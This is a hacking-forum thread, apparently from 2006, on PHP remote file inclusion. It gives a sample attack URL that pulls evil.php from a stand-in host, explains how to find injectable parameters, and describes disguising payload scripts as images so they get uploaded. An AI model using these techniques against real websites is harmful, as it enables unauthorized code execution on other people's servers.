Follow us on Twitter!
One mans freedom fighter, another's terrorist.
Friday, April 18, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 23
Guests Online: 22
Members Online: 1

Registered Members: 82826
Newest Member: Jakob
Latest Articles
View Thread

HellBound Hackers | Computer General | Web hacking

Author

PHP Injection


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 03-02-06 21:45
Hey, i was just searching google for some info about php injection, all i found is that you can set the variable and inject ur code where the variable is included in php code. but my question is how can you find this exploit ?? i mean u can't see the variable name so you can't test if it's vuln. that would be great if you could give me more info/article/link or anything about php injection.
thanks,
GreyFox


Author

RE: PHP Injection


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 03-02-06 22:08
PHP injection is basicly forcing a PHP script to execute remote code.

One of the easiest forms of PHP injection im aware of is to have a website run a script from your site using there navigation tags.

Example:
lets say www.victim.com has a page like www.victim.com/index.php?id=index.php

just from the url we can tell that there executing the file "index.php".

we can easily tamper with this by uploading a script at a remote location and then running it using the same concept.
i.e.: www.victim.com/index.php?id=http://www.hacker.com/evil.php

I'll get you some links to get the exact information soon. Smile


Author

RE: PHP Injection


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 03-02-06 22:21
There's a few ways to know such variables.

1. Use the source luke! Most sites use existing projects that have the entire source code readily available.

2. Failing that, standard examination of html/js source is always useful. Link harvesting should yield numerous var=type for you to play with.

3. Logical guessing of common dirs, files, vars. Examples are /admin, admin.php and ?action=delete.

Not too hard to get going using those ideas. =)

HTH
Author

RE: PHP Injection


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-02-06 00:25
That's pretty cool.

I wrote [http://www.rohitab.com/discuss/lofiversion/index.php/t9626.html]. Loving it.


Author

RE: PHP Injection


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-02-06 01:25
well thanks, those are good info about this.
but most of the targets i found which seemed to be vuln, were not vuln. in fact they were just using "<iframe>" tag to show the page.
i have a question about one thing though. why you set the type of your script file like "jpg" ??
does it even matter?? (my guess is not but i just wanted to make sure Grin)
thanx,
GreyFox


Author

RE: PHP Injection


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-02-06 02:07
In essence, PHP reads the file as text. Setting it to .gif or .jpeg allows you to upload it to some forum's avatar bin, like the example of Rohitab's forums before they moved to Invision. (Some scripts actually validate the file to be an image before uploading.) Despite it's extension, PHP's include() and require() functions still read the file as text.